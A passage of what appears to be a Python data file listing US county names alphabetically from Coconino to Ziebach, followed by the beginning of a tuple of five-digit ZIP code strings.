'Coconino County',
'Codington County',
'Coffee County',
'Coffey County',
'Coke County',
'Colbert County',
'Cole County',
'Coleman County',
'Coles County',
'Colfax County',
'Colleton County',
'Collier County',
'Collin County',
'Collingsworth County',
'Colonial Heights city',
'Colorado County',
'Colquitt County',
'Columbia County',
'Columbiana County',
'Columbus County',
'Colusa County',
'Comal County',
'Comanche County',
'Concho County',
'Concordia Parish',
'Conecuh County',
'Conejos County',
'Contra Costa County',
'Converse County',
'Conway County',
'Cook County',
'Cooke County',
'Cooper County',
'Coosa County',
'Coos County',
'Copiah County',
'Corson County',
'Cortland County',
'Coryell County',
'Coshocton County',
'Costilla County',
'Cottle County',
'Cotton County',
'Cottonwood County',
'Covington city',
'Covington County',
'Coweta County',
'Cowley County',
'Cowlitz County',
'Craig County',
'Craighead County',
'Crane County',
'Craven County',
'Crawford County',
'Creek County',
'Crenshaw County',
'Crisp County',
'Crittenden County',
'Crockett County',
'Crook County',
'Crosby County',
'Cross County',
'Crowley County',
'Crow Wing County',
'Culberson County',
'Cullman County',
'Culpeper County',
'Cumberland County',
'Cuming County',
'Currituck County',
'Curry County',
'Custer County',
'Cuyahoga County',
'Dade County',
'Daggett County',
'Dakota County',
'Dale County',
'Dallam County',
'Dallas County',
'Dane County',
'Daniels County',
'Danville city',
'Dare County',
'Darke County',
'Darlington County',
'Dauphin County',
'Davidson County',
'Davie County',
'Daviess County',
'Davis County',
'Davison County',
'Dawes County',
'Dawson County',
'Day County',
'Deaf Smith County',
'Dearborn County',
'DeBaca County',
'Decatur County',
'Deer Lodge County',
'Defiance County',
'De Kalb County',
'DeKalb County',
'Delaware County',
'Del Norte County',
'Delta County',
'Denali Borough',
'Dent County',
'Denton County',
'Denver County',
'Deschutes County',
'Desha County',
'Des Moines County',
'DeSoto County',
'De Soto Parish',
'Deuel County',
'Dewey County',
'De Witt County',
'DeWitt County',
'Dickens County',
'Dickenson County',
'Dickey County',
'Dickinson County',
'Dickson County',
'Dillingham Census Area',
'Dillon County',
'Dimmit County',
'Dinwiddie County',
'District of Columbia',
'Divide County',
'Dixie County',
'Dixon County',
'Doddridge County',
'Dodge County',
'Dolores County',
'Dona Ana County',
'Doniphan County',
'Donley County',
'Dooly County',
'Door County',
'Dorchester County',
'Dougherty County',
'Douglas County',
'Drew County',
'Dubois County',
'Dubuque County',
'Duchesne County',
'Dukes County',
'Dundy County',
'Dunklin County',
'Dunn County',
'DuPage County',
'Duplin County',
'Durham County',
'Dutchess County',
'Duval County',
'Dyer County',
'Eagle County',
'Early County',
'East Baton Rouge Parish',
'East Carroll Parish',
'East Feliciana Parish',
'Eastland County',
'Eaton County',
'Eau Claire County',
'Echols County',
'Ector County',
'Eddy County',
'Edgar County',
'Edgecombe County',
'Edgefield County',
'Edmonson County',
'Edmunds County',
'Edwards County',
'Effingham County',
'Elbert County',
'El Dorado County',
'Elk County',
'Elkhart County',
'Elko County',
'Elliott County',
'Ellis County',
'Ellsworth County',
'Elmore County',
'El Paso County',
'Emanuel County',
'Emery County',
'Emmet County',
'Emmons County',
'Emporia city',
'Erath County',
'Erie County',
'Escambia County',
'Esmeralda County',
'Essex County',
'Estill County',
'Etowah County',
'Eureka County',
'Evangeline Parish',
'Evans County',
'Fairbanks North Star Borough',
'Fairfax city',
'Fairfax County',
'Fairfield County',
'Fallon County',
'Fall River County',
'Falls Church city',
'Falls County',
'Fannin County',
'Faribault County',
'Faulk County',
'Faulkner County',
'Fauquier County',
'Fayette County',
'Fentress County',
'Fergus County',
'Ferry County',
'Fillmore County',
'Finney County',
'Fisher County',
'Flagler County',
'Flathead County',
'Fleming County',
'Florence County',
'Floyd County',
'Fluvanna County',
'Foard County',
'Fond du Lac County',
'Ford County',
'Forest County',
'Forrest County',
'Forsyth County',
'Fort Bend County',
'Foster County',
'Fountain County',
'Franklin city',
'Franklin County',
'Franklin Parish',
'Frederick County',
'Fredericksburg city',
'Freeborn County',
'Freestone County',
'Fremont County',
'Fresno County',
'Frio County',
'Frontier County',
'Fulton County',
'Furnas County',
'Gadsden County',
'Gage County',
'Gaines County',
'Galax city',
'Gallatin County',
'Gallia County',
'Galveston County',
'Garden County',
'Garfield County',
'Garland County',
'Garrard County',
'Garrett County',
'Garvin County',
'Garza County',
'Gasconade County',
'Gaston County',
'Gates County',
'Geary County',
'Geauga County',
'Gem County',
'Genesee County',
'Geneva County',
'Gentry County',
'George County',
'Georgetown County',
'Gibson County',
'Gila County',
'Gilchrist County',
'Giles County',
'Gillespie County',
'Gilliam County',
'Gilmer County',
'Gilpin County',
'Glacier County',
'Glades County',
'Gladwin County',
'Glascock County',
'Glasscock County',
'Glenn County',
'Gloucester County',
'Glynn County',
'Gogebic County',
'Golden Valley County',
'Goliad County',
'Gonzales County',
'Goochland County',
'Goodhue County',
'Gooding County',
'Gordon County',
'Goshen County',
'Gosper County',
'Gove County',
'Grady County',
'Grafton County',
'Graham County',
'Grainger County',
'Grand County',
'Grand Forks County',
'Grand Isle County',
'Grand Traverse County',
'Granite County',
'Grant County',
'Grant Parish',
'Granville County',
'Gratiot County',
'Graves County',
'Gray County',
'Grays Harbor County',
'Grayson County',
'Greeley County',
'Greenbrier County',
'Green County',
'Greene County',
'Green Lake County',
'Greenlee County',
'Greensville County',
'Greenup County',
'Greenville County',
'Greenwood County',
'Greer County',
'Gregg County',
'Gregory County',
'Grenada County',
'Griggs County',
'Grimes County',
'Grundy County',
'Guadalupe County',
'Guernsey County',
'Guilford County',
'Gulf County',
'Gunnison County',
'Guthrie County',
'Gwinnett County',
'Haakon County',
'Habersham County',
'Haines Borough',
'Hale County',
'Halifax County',
'Hall County',
'Hamblen County',
'Hamilton County',
'Hamlin County',
'Hampden County',
'Hampshire County',
'Hampton city',
'Hampton County',
'Hancock County',
'Hand County',
'Hanover County',
'Hansford County',
'Hanson County',
'Haralson County',
'Hardee County',
'Hardeman County',
'Hardin County',
'Harding County',
'Hardy County',
'Harford County',
'Harlan County',
'Harmon County',
'Harnett County',
'Harney County',
'Harper County',
'Harris County',
'Harrisonburg city',
'Harrison County',
'Hart County',
'Hartford County',
'Hartley County',
'Harvey County',
'Haskell County',
'Hawaii County',
'Hawkins County',
'Hayes County',
'Hays County',
'Haywood County',
'Heard County',
'Hemphill County',
'Hempstead County',
'Henderson County',
'Hendricks County',
'Hendry County',
'Hennepin County',
'Henrico County',
'Henry County',
'Herkimer County',
'Hernando County',
'Hertford County',
'Hettinger County',
'Hickman County',
'Hickory County',
'Hidalgo County',
'Highland County',
'Highlands County',
'Hill County',
'Hillsborough County',
'Hillsdale County',
'Hinds County',
'Hinsdale County',
'Hitchcock County',
'Hocking County',
'Hockley County',
'Hodgeman County',
'Hoke County',
'Holmes County',
'Holt County',
'Honolulu County',
'Hood County',
'Hood River County',
'Hooker County',
'Hopewell city',
'Hopkins County',
'Horry County',
'Hot Spring County',
'Hot Springs County',
'Houghton County',
'Houston County',
'Howard County',
'Howell County',
'Hubbard County',
'Hudson County',
'Hudspeth County',
'Huerfano County',
'Hughes County',
'Humboldt County',
'Humphreys County',
'Hunt County',
'Hunterdon County',
'Huntingdon County',
'Huntington County',
'Huron County',
'Hutchinson County',
'Hyde County',
'Iberia Parish',
'Iberville Parish',
'Ida County',
'Idaho County',
'Imperial County',
'Independence County',
'Indiana County',
'Indian River County',
'Ingham County',
'Inyo County',
'Ionia County',
'Iosco County',
'Iowa County',
'Iredell County',
'Irion County',
'Iron County',
'Iroquois County',
'Irwin County',
'Isabella County',
'Isanti County',
'Island County',
'Isle of Wight County',
'Issaquena County',
'Itasca County',
'Itawamba County',
'Izard County',
'Jack County',
'Jackson County',
'<NAME>',
'James City County',
'Jasper County',
'Jay County',
'<NAME> County',
'Jefferson County',
'<NAME> County',
'<NAME>',
'<NAME>ish',
'Jenkins County',
'Jennings County',
'Jerauld County',
'Jerome County',
'Jersey County',
'Jessamine County',
'Jewell County',
'<NAME> County',
'<NAME> County',
'<NAME> County',
'Johnson County',
'Johnston County',
'Jones County',
'Josephine County',
'Juab County',
'Judith Basin County',
'Juneau Borough',
'Juneau County',
'Juniata County',
'Kalamazoo County',
'Kalkaska County',
'Kanabec County',
'Kanawha County',
'Kandiyohi County',
'Kane County',
'Kankakee County',
'Karnes County',
'Kauai County',
'Kaufman County',
'Kay County',
'Kearney County',
'Kearny County',
'Keith County',
'Kemper County',
'Kenai Peninsula Borough',
'Kendall County',
'Kenedy County',
'Kennebec County',
'Kenosha County',
'Kent County',
'Kenton County',
'Keokuk County',
'Kern County',
'Kerr County',
'Kershaw County',
'Ketchikan Gateway Borough',
'Kewaunee County',
'Keweenaw County',
'Keya Paha County',
'Kidder County',
'Kimball County',
'Kimble County',
'King and Queen County',
'King County',
'Kingfisher County',
'King George County',
'Kingman County',
'Kingsbury County',
'Kings County',
'King William County',
'Kinney County',
'Kiowa County',
'Kit Carson County',
'Kitsap County',
'Kittitas County',
'Kittson County',
'Klamath County',
'Kleberg County',
'Klickitat County',
'Knott County',
'Knox County',
'Kodiak Island Borough',
'Koochiching County',
'Kootenai County',
'Kosciusko County',
'Kossuth County',
'Labette County',
'Lackawanna County',
'Laclede County',
'Lac qui Parle County',
'La Crosse County',
'Lafayette County',
'Lafayette Parish',
'Lafourche Parish',
'Lagrange County',
'Lake and Peninsula Borough',
'Lake County',
'Lake of the Woods County',
'Lamar County',
'Lamb County',
'Lamoille County',
'LaMoure County',
'Lampasas County',
'Lancaster County',
'Lander County',
'Lane County',
'Langlade County',
'Lanier County',
'La Paz County',
'Lapeer County',
'La Plata County',
'La Porte County',
'Laramie County',
'Larimer County',
'Larue County',
'La Salle County',
'La Salle Parish',
'Las Animas County',
'Lassen County',
'Latah County',
'Latimer County',
'Lauderdale County',
'Laurel County',
'Laurens County',
'Lavaca County',
'Lawrence County',
'Lea County',
'Leake County',
'Leavenworth County',
'Lebanon County',
'Lee County',
'Leelanau County',
'Leflore County',
'Le Flore County',
'Lehigh County',
'Lemhi County',
'Lenawee County',
'Lenoir County',
'Leon County',
'Leslie County',
'Le Sueur County',
'Letcher County',
'Levy County',
'Lewis and Clark County',
'Lewis County',
'Lexington city',
'Lexington County',
'Liberty County',
'Licking County',
'Limestone County',
'Lincoln County',
'Lincoln Parish',
'Linn County',
'Lipscomb County',
'Litchfield County',
'Little River County',
'Live Oak County',
'Livingston County',
'Livingston Parish',
'Llano County',
'Logan County',
'Long County',
'Lonoke County',
'Lorain County',
'Los Alamos County',
'Los Angeles County',
'Loudon County',
'Loudoun County',
'Louisa County',
'Loup County',
'Love County',
'Loving County',
'Lowndes County',
'Lubbock County',
'Lucas County',
'Luce County',
'Lumpkin County',
'Luna County',
'Lunenburg County',
'Luzerne County',
'Lycoming County',
'Lyman County',
'Lynchburg city',
'Lynn County',
'Lyon County',
'Mackinac County',
'Macomb County',
'Macon County',
'Macoupin County',
'Madera County',
'Madison County',
'Madison Parish',
'Magoffin County',
'Mahaska County',
'Mahnomen County',
'Mahoning County',
'Major County',
'Malheur County',
'Manassas city',
'Manassas Park city',
'Manatee County',
'Manistee County',
'Manitowoc County',
'Marathon County',
'Marengo County',
'Maricopa County',
'Maries County',
'Marin County',
'Marinette County',
'Marion County',
'Mariposa County',
'Marlboro County',
'Marquette County',
'Marshall County',
'Martin County',
'Martinsville city',
'Mason County',
'Massac County',
'Matagorda County',
'Matanuska-Susitna Borough',
'Mathews County',
'Maui County',
'Maury County',
'Maverick County',
'Mayes County',
'McClain County',
'McCone County',
'McCook County',
'McCormick County',
'McCracken County',
'McCreary County',
'McCulloch County',
'McCurtain County',
'McDonald County',
'McDonough County',
'McDowell County',
'McDuffie County',
'McHenry County',
'McIntosh County',
'McKean County',
'McKenzie County',
'McKinley County',
'McLean County',
'McLennan County',
'McLeod County',
'McMinn County',
'McMullen County',
'McNairy County',
'McPherson County',
'Meade County',
'Meagher County',
'Mecklenburg County',
'Mecosta County',
'Medina County',
'Meeker County',
'Meigs County',
'Mellette County',
'Menard County',
'Mendocino County',
'Menifee County',
'Menominee County',
'Merced County',
'Mercer County',
'Meriwether County',
'Merrick County',
'Merrimack County',
'Mesa County',
'Metcalfe County',
'Miami County',
'Middlesex County',
'Midland County',
'Mifflin County',
'Milam County',
'Millard County',
'Mille Lacs County',
'Miller County',
'Mills County',
'Milwaukee County',
'Mineral County',
'Miner County',
'Mingo County',
'Minidoka County',
'Minnehaha County',
'Missaukee County',
'Mississippi County',
'Missoula County',
'Mitchell County',
'Mobile County',
'Modoc County',
'Moffat County',
'Mohave County',
'Moniteau County',
'Monmouth County',
'Mono County',
'Monona County',
'Monongalia County',
'Monroe County',
'Montague County',
'Montcalm County',
'Monterey County',
'Montezuma County',
'Montgomery County',
'Montmorency County',
'Montour County',
'Montrose County',
'Moody County',
'Moore County',
'Mora County',
'Morehouse Parish',
'Morgan County',
'Morrill County',
'Morris County',
'Morrison County',
'Morrow County',
'Morton County',
'Motley County',
'Moultrie County',
'Mountrail County',
'Mower County',
'Muhlenberg County',
'Multnomah County',
'Murray County',
'Muscatine County',
'Muscogee County',
'Muskegon County',
'Muskingum County',
'Muskogee County',
'Musselshell County',
'Nacogdoches County',
'Nance County',
'Nantucket County',
'Napa County',
'Nash County',
'Nassau County',
'Natchitoches Parish',
'Natrona County',
'Navajo County',
'Navarro County',
'Nelson County',
'Nemaha County',
'Neosho County',
'Neshoba County',
'Ness County',
'Nevada County',
'Newaygo County',
'Newberry County',
'New Castle County',
'New Hanover County',
'New Haven County',
'New Kent County',
'New London County',
'New Madrid County',
'Newport County',
'Newport News city',
'Newton County',
'New York County',
'Nez Perce County',
'Niagara County',
'Nicholas County',
'Nicollet County',
'Niobrara County',
'Noble County',
'Nobles County',
'Nodaway County',
'Nolan County',
'Nome Census Area',
'Norfolk city',
'Norfolk County',
'Norman County',
'Northampton County',
'North Slope Borough',
'Northumberland County',
'Northwest Arctic Borough',
'Norton city',
'Norton County',
'Nottoway County',
'Nowata County',
'Noxubee County',
'Nuckolls County',
'Nueces County',
'Nye County',
'Oakland County',
'Obion County',
'O-Brien County',
'Oceana County',
'Ocean County',
'Ochiltree County',
'Oconee County',
'Oconto County',
'Ogemaw County',
'Ogle County',
'Oglethorpe County',
'Ohio County',
'Okaloosa County',
'Okanogan County',
'Okeechobee County',
'Okfuskee County',
'Oklahoma County',
'Okmulgee County',
'Oktibbeha County',
'Oldham County',
'Oliver County',
'Olmsted County',
'Oneida County',
'Onondaga County',
'Onslow County',
'Ontario County',
'Ontonagon County',
'Orangeburg County',
'Orange County',
'Oregon County',
'Orleans County',
'Orleans Parish',
'Osage County',
'Osborne County',
'Osceola County',
'Oscoda County',
'Oswego County',
'Otero County',
'Otoe County',
'Otsego County',
'Ottawa County',
'Otter Tail County',
'Ouachita County',
'Ouachita Parish',
'Ouray County',
'Outagamie County',
'Overton County',
'Owen County',
'Owsley County',
'Owyhee County',
'Oxford County',
'Ozark County',
'Ozaukee County',
'Pacific County',
'Page County',
'Palm Beach County',
'Palo Alto County',
'Palo Pinto County',
'Pamlico County',
'Panola County',
'Park County',
'Parke County',
'Parker County',
'Parmer County',
'Pasco County',
'Pasquotank County',
'Passaic County',
'Patrick County',
'Paulding County',
'Pawnee County',
'Payette County',
'Payne County',
'Peach County',
'Pearl River County',
'Pecos County',
'Pembina County',
'Pemiscot County',
'Pender County',
'Pendleton County',
'Pend Oreille County',
'Pennington County',
'Penobscot County',
'Peoria County',
'Pepin County',
'Perkins County',
'Perquimans County',
'Perry County',
'Pershing County',
'Person County',
'Petersburg city',
'Petroleum County',
'Pettis County',
'Phelps County',
'Philadelphia County',
'Phillips County',
'Piatt County',
'Pickaway County',
'Pickens County',
'Pickett County',
'Pierce County',
'Pike County',
'Pima County',
'Pinal County',
'Pine County',
'Pinellas County',
'Pipestone County',
'Piscataquis County',
'Pitkin County',
'Pitt County',
'Pittsburg County',
'Pittsylvania County',
'Piute County',
'Placer County',
'Plaquemines Parish',
'Platte County',
'Pleasants County',
'Plumas County',
'Plymouth County',
'Pocahontas County',
'Poinsett County',
'Pointe Coupee Parish',
'Polk County',
'Pondera County',
'Pontotoc County',
'Pope County',
'Poquoson city',
'Portage County',
'Porter County',
'Portsmouth city',
'Posey County',
'Pottawatomie County',
'Pottawattamie County',
'Potter County',
'Powder River County',
'Powell County',
'Power County',
'Poweshiek County',
'Powhatan County',
'Prairie County',
'Pratt County',
'Preble County',
'Prentiss County',
'Presidio County',
'Presque Isle County',
'Preston County',
'Price County',
'Prince Edward County',
'Prince George County',
'Prince William County',
'Providence County',
'Prowers County',
'Pueblo County',
'Pulaski County',
'Pushmataha County',
'Putnam County',
'Quay County',
'Queen Anne County',
'Queens County',
'Quitman County',
'Rabun County',
'Racine County',
'Radford city',
'Rains County',
'Raleigh County',
'Ralls County',
'Ramsey County',
'Randall County',
'Randolph County',
'Rankin County',
'Ransom County',
'Rapides Parish',
'Rappahannock County',
'Ravalli County',
'Rawlins County',
'Ray County',
'Reagan County',
'Real County',
'Red Lake County',
'Red River County',
'Red River Parish',
'Red Willow County',
'Redwood County',
'Reeves County',
'Refugio County',
'Reno County',
'Rensselaer County',
'Renville County',
'Republic County',
'Reynolds County',
'Rhea County',
'Rice County',
'Richardson County',
'Rich County',
'Richland County',
'Richland Parish',
'Richmond city',
'Richmond County',
'Riley County',
'Ringgold County',
'Rio Arriba County',
'Rio Blanco County',
'Rio Grande County',
'Ripley County',
'Ritchie County',
'Riverside County',
'Roane County',
'Roanoke city',
'Roanoke County',
'Roberts County',
'Robertson County',
'Robeson County',
'Rockbridge County',
'Rockcastle County',
'Rock County',
'Rockdale County',
'Rockingham County',
'Rock Island County',
'Rockland County',
'Rockwall County',
'Roger Mills County',
'Rogers County',
'Rolette County',
'Rooks County',
'Roosevelt County',
'Roscommon County',
'Roseau County',
'Rosebud County',
'Ross County',
'Routt County',
'Rowan County',
'Runnels County',
'Rush County',
'Rusk County',
'Russell County',
'Rutherford County',
'Rutland County',
'Sabine County',
'Sabine Parish',
'Sac County',
'Sacramento County',
'Sagadahoc County',
'Saginaw County',
'Saguache County',
'Salem city',
'Salem County',
'Saline County',
'Salt Lake County',
'Saluda County',
'Sampson County',
'San Augustine County',
'San Benito County',
'San Bernardino County',
'Sanborn County',
'Sanders County',
'San Diego County',
'Sandoval County',
'Sandusky County',
'San Francisco County',
'Sangamon County',
'Sanilac County',
'San Jacinto County',
'San Joaquin County',
'San Juan County',
'San Luis Obispo County',
'San Mateo County',
'San Miguel County',
'San Patricio County',
'Sanpete County',
'San Saba County',
'Santa Barbara County',
'Santa Clara County',
'Santa Cruz County',
'Santa Fe County',
'Santa Rosa County',
'Sarasota County',
'Saratoga County',
'Sargent County',
'Sarpy County',
'Sauk County',
'Saunders County',
'Sawyer County',
'Schenectady County',
'Schleicher County',
'Schley County',
'Schoharie County',
'Schoolcraft County',
'Schuyler County',
'Schuylkill County',
'Scioto County',
'Scotland County',
'Scott County',
'Scotts Bluff County',
'Screven County',
'Scurry County',
'Searcy County',
'Sebastian County',
'Sedgwick County',
'Seminole County',
'Seneca County',
'Sequatchie County',
'Sequoyah County',
'Sevier County',
'Seward County',
'Shackelford County',
'Shannon County',
'Sharkey County',
'Sharp County',
'Shasta County',
'Shawano County',
'Shawnee County',
'Sheboygan County',
'Shelby County',
'Shenandoah County',
'Sherburne County',
'Sheridan County',
'Sherman County',
'Shiawassee County',
'Shoshone County',
'Sibley County',
'Sierra County',
'Silver Bow County',
'Simpson County',
'Sioux County',
'Siskiyou County',
'Sitka Borough',
'Skagit County',
'Skamania County',
'Slope County',
'Smith County',
'Smyth County',
'Snohomish County',
'Snyder County',
'Socorro County',
'Solano County',
'Somerset County',
'Somervell County',
'Sonoma County',
'Southampton County',
'Spalding County',
'Spartanburg County',
'Spencer County',
'Spink County',
'Spokane County',
'Spotsylvania County',
'Stafford County',
'Stanislaus County',
'Stanley County',
'Stanly County',
'Stanton County',
'Stark County',
'Starke County',
'Starr County',
'Staunton city',
'Stearns County',
'Steele County',
'Stephens County',
'Stephenson County',
'Sterling County',
'Steuben County',
'Stevens County',
'Stewart County',
'Stillwater County',
'Stoddard County',
'Stokes County',
'Stone County',
'Stonewall County',
'Storey County',
'Story County',
'Strafford County',
'Stutsman County',
'Sublette County',
'Suffolk city',
'Suffolk County',
'Sullivan County',
'Sully County',
'Summers County',
'Summit County',
'Sumner County',
'Sumter County',
'Sunflower County',
'Surry County',
'Susquehanna County',
'Sussex County',
'Sutter County',
'Sutton County',
'Suwannee County',
'Swain County',
'Sweet Grass County',
'Sweetwater County',
'Swift County',
'Swisher County',
'Switzerland County',
'Talbot County',
'Taliaferro County',
'Talladega County',
'Tallahatchie County',
'Tallapoosa County',
'Tama County',
'Taney County',
'Tangipahoa Parish',
'Taos County',
'Tarrant County',
'Tate County',
'Tattnall County',
'Taylor County',
'Tazewell County',
'Tehama County',
'Telfair County',
'Teller County',
'Tensas Parish',
'Terrebonne Parish',
'Terrell County',
'Terry County',
'Teton County',
'Texas County',
'Thayer County',
'Thomas County',
'Throckmorton County',
'Thurston County',
'Tift County',
'Tillamook County',
'Tillman County',
'Tioga County',
'Tippah County',
'Tippecanoe County',
'Tipton County',
'Tishomingo County',
'Titus County',
'Todd County',
'Tolland County',
'Tom Green County',
'Tompkins County',
'Tooele County',
'Toole County',
'Toombs County',
'Torrance County',
'Towner County',
'Towns County',
'Traill County',
'Transylvania County',
'Traverse County',
'Travis County',
'Treasure County',
'Trego County',
'Trempealeau County',
'Treutlen County',
'Trigg County',
'Trimble County',
'Trinity County',
'Tripp County',
'Troup County',
'Trousdale County',
'Trumbull County',
'Tucker County',
'Tulare County',
'Tulsa County',
'Tunica County',
'Tuolumne County',
'Turner County',
'Tuscaloosa County',
'Tuscarawas County',
'Tuscola County',
'Twiggs County',
'Twin Falls County',
'Tyler County',
'Tyrrell County',
'Uinta County',
'Uintah County',
'Ulster County',
'Umatilla County',
'Unicoi County',
'Union County',
'Union Parish',
'Upshur County',
'Upson County',
'Upton County',
'Utah County',
'Uvalde County',
'Valdez-Cordova Census Area',
'Valencia County',
'Valley County',
'Val Verde County',
'Van Buren County',
'Vance County',
'Vanderburgh County',
'Van Wert County',
'Van Zandt County',
'Venango County',
'Ventura County',
'Vermilion County',
'Vermilion Parish',
'Vermillion County',
'Vernon County',
'Vernon Parish',
'Victoria County',
'Vigo County',
'Vilas County',
'Vinton County',
'Virginia Beach city',
'Volusia County',
'Wabasha County',
'Wabash County',
'Wabaunsee County',
'Wade Hampton Census Area',
'Wadena County',
'Wagoner County',
'Wahkiakum County',
'Wake County',
'Wakulla County',
'Waldo County',
'Walker County',
'Wallace County',
'Walla Walla County',
'Waller County',
'Wallowa County',
'Walsh County',
'Walthall County',
'Walton County',
'Walworth County',
'Wapello County',
'Ward County',
'Ware County',
'Warren County',
'Warrick County',
'Wasatch County',
'Wasco County',
'Waseca County',
'Washakie County',
'Washburn County',
'Washington County',
'Washington Parish',
'Washita County',
'Washoe County',
'Washtenaw County',
'Watauga County',
'Watonwan County',
'Waukesha County',
'Waupaca County',
'Waushara County',
'Wayne County',
'Waynesboro city',
'Weakley County',
'Webb County',
'Weber County',
'Webster County',
'Webster Parish',
'Weld County',
'Wells County',
'West Baton Rouge Parish',
'West Carroll Parish',
'Westchester County',
'West Feliciana Parish',
'Westmoreland County',
'Weston County',
'Wetzel County',
'Wexford County',
'Wharton County',
'Whatcom County',
'Wheatland County',
'Wheeler County',
'White County',
'White Pine County',
'Whiteside County',
'Whitfield County',
'Whitley County',
'Whitman County',
'Wibaux County',
'Wichita County',
'Wicomico County',
'Wilbarger County',
'Wilcox County',
'Wilkes County',
'Wilkin County',
'Wilkinson County',
'Willacy County',
'Will County',
'Williamsburg city',
'Williamsburg County',
'Williams County',
'Williamson County',
'Wilson County',
'Winchester city',
'Windham County',
'Windsor County',
'Winkler County',
'Winnebago County',
'Winneshiek County',
'Winn Parish',
'Winona County',
'Winston County',
'Wirt County',
'Wise County',
'Wolfe County',
'Woodbury County',
'Wood County',
'Woodford County',
'Woodruff County',
'Woods County',
'Woodson County',
'Woodward County',
'Worcester County',
'Worth County',
'Wright County',
'Wyandot County',
'Wyandotte County',
'Wyoming County',
'Wythe County',
'Yadkin County',
'Yakima County',
'Yakutat Borough',
'Yalobusha County',
'Yamhill County',
'Yancey County',
'Yankton County',
'Yates County',
'Yavapai County',
'Yazoo County',
'Yell County',
'Yellow Medicine County',
'Yellowstone County',
'Yoakum County',
'Yolo County',
'York County',
'Young County',
'Yuba County',
'Yukon-Koyukuk Census Area',
'Yuma County',
'Zapata County',
'Zavala County',
'Ziebach County',
)
ZIP_CODES = (
"00601",
"00608",
"00626",
"00649",
"00659",
"00668",
"00669",
"00716",
"00725",
"00728",
"00741",
"00749",
"00750",
"00762",
"00764",
"00769",
"00791",
"00794",
"00804",
"00816",
"00836",
"00844",
"00862",
"00868",
"00875",
"00896",
"00897",
"00902",
"00909",
"00919",
"00923",
"00925",
"00944",
"00969",
"00999",
"01008",
"01011",
"01018",
"01019",
"01028",
"01051",
"01092",
"01099",
"01114",
"01119",
"01125",
"01134",
"01140",
"01173",
"01184",
"01186",
"01187",
"01189",
"01213",
"01218",
"01231",
"01234",
"01235",
"01262",
"01281",
"01302",
"01325",
"01332",
"01344",
"01366",
"01452",
"01454",
"01494",
"01499",
"01513",
"01519",
"01565",
"01574",
"01675",
"01683",
"01687",
"01704",
"01740",
"01743",
"01747",
"01750",
"01760",
"01801",
"01804",
"01806",
"01809",
"01816",
"01818",
"01819",
"01829",
"01878",
"01889",
"01945",
"01987",
"01998",
"02003",
"02009",
"02021",
"02022",
"02023",
"02053",
"02121",
"02129",
"02145",
"02190",
"02239",
"02249",
"02251",
"02254",
"02269",
"02275",
"02285",
"02292",
"02311",
"02315",
"02332",
"02349",
"02357",
"02364",
"02381",
"02382",
"02392",
"02397",
"02421",
"02424",
"02438",
"02444",
"02452",
"02454",
"02504",
"02533",
"02534",
"02544",
"02552",
"02633",
"02637",
"02644",
"02646",
"02663",
"02682",
"02705",
"02706",
"02723",
"02750",
"02805",
"02810",
"02819",
"02824",
"02844",
"02876",
"02884",
"02891",
"02893",
"02897",
"02924",
"02966",
"03044",
"03055",
"03059",
"03077",
"03103",
"03132",
"03162",
"03165",
"03221",
"03229",
"03286",
"03298",
"03324",
"03329",
"03331",
"03338",
"03408",
"03412",
"03414",
"03419",
"03434",
"03484",
"03498",
"03524",
"03535",
"03603",
"03627",
"03675",
"03709",
"03788",
"03835",
"03887",
"03889",
"03892",
"03898",
"03901",
"03942",
"03960",
"03972",
"03973",
"03994",
"04005",
"04025",
"04045",
"04051",
"04081",
"04111",
"04124",
"04130",
"04192",
"04195",
"04204",
"04228",
"04283",
"04304",
"04388",
"04390",
"04404",
"04424",
"04445",
"04468",
"04541",
"04551",
"04557",
"04558",
"04584",
"04627",
"04645",
"04662",
"04674",
"04690",
"04692",
"04698",
"04704",
"04707",
"04720",
"04736",
"04737",
"04745",
"04753",
"04767",
"04769",
"04774",
"04788",
"04790",
"04812",
"04840",
"04844",
"04853",
"04867",
"04873",
"04889",
"04924",
"04938",
"04955",
"04969",
"05008",
"05022",
"05029",
"05062",
"05064",
"05066",
"05089",
"05125",
"05136",
"05146",
"05154",
"05192",
"05193",
"05202",
"05214",
"05242",
"05286",
"05294",
"05348",
"05349",
"05352",
"05369",
"05443",
"05451",
"05454",
"05519",
"05575",
"05580",
"05581",
"05593",
"05618",
"05638",
"05679",
"05685",
"05714",
"05715",
"05719",
"05724",
"05783",
"05841",
"05858",
"05871",
"05872",
"05881",
"05894",
"05954",
"06002",
"06013",
"06020",
"06023",
"06036",
"06058",
"06064",
"06065",
"06069",
"06091",
"06095",
"06101",
"06108",
"06121",
"06166",
"06176",
"06191",
"06205",
"06221",
"06223",
"06225",
"06269",
"06273",
"06276",
"06281",
"06309",
"06317",
"06352",
"06399",
"06404",
"06417",
"06419",
"06443",
"06458",
"06467",
"06488",
"06494",
"06503",
"06545",
"06557",
"06565",
"06566",
"06575",
"06580",
"06585",
"06587",
"06600",
"06645",
"06660",
"06674",
"06698",
"06715",
"06734",
"06792",
"06796",
"06835",
"06845",
"06877",
"06884",
"06891",
"06894",
"06940",
"06943",
"06964",
"06978",
"06986",
"07031",
"07057",
"07110",
"07117",
"07134",
"07149",
"07157",
"07175",
"07194",
"07207",
"07214",
"07222",
"07253",
"07268",
"07296",
"07297",
"07302",
"07319",
"07347",
"07349",
"07387",
"07388",
"07396",
"07398",
"07420",
"07467",
"07471",
"07493",
"07496",
"07509",
"07538",
"07555",
"07564",
"07571",
"07584",
"07597",
"07621",
"07622",
"07657",
"07666",
"07775",
"07872",
"07892",
"07917",
"07934",
"07954",
"07969",
"08011",
"08041",
"08084",
"08129",
"08134",
"08137",
"08138",
"08209",
"08244",
"08246",
"08283",
"08287",
"08302",
"08313",
"08345",
"08346",
"08348",
"08352",
"08383",
"08438",
"08496",
"08532",
"08536",
"08540",
"08541",
"08551",
"08595",
"08601",
"08603",
"08614",
"08641",
"08648",
"08654",
"08659",
"08675",
"08680",
"08687",
"08695",
"08719",
"08740",
"08764",
"08765",
"08767",
"08809",
"08822",
"08852",
"08880",
"08883",
"08937",
"08939",
"08942",
"08954",
"08970",
"08971",
"08975",
"08989",
"09030",
"09034",
"09082",
"09096",
"09119",
"09125",
"09129",
"09148",
"09156",
"09167",
"09179",
"09189",
"09193",
"09205",
"09217",
"09254",
"09321",
"09322",
"09354",
"09367",
"09373",
"09384",
"09385",
"09411",
"09428",
"09431",
"09452",
"09454",
"09477",
"09483",
"09502",
"09509",
"09515",
"09525",
"09530",
"09532",
"09534",
"09548",
"09550",
"09566",
"09568",
"09571",
"09583",
"09584",
"09594",
"09603",
"09614",
"09634",
"09637",
"09651",
"09672",
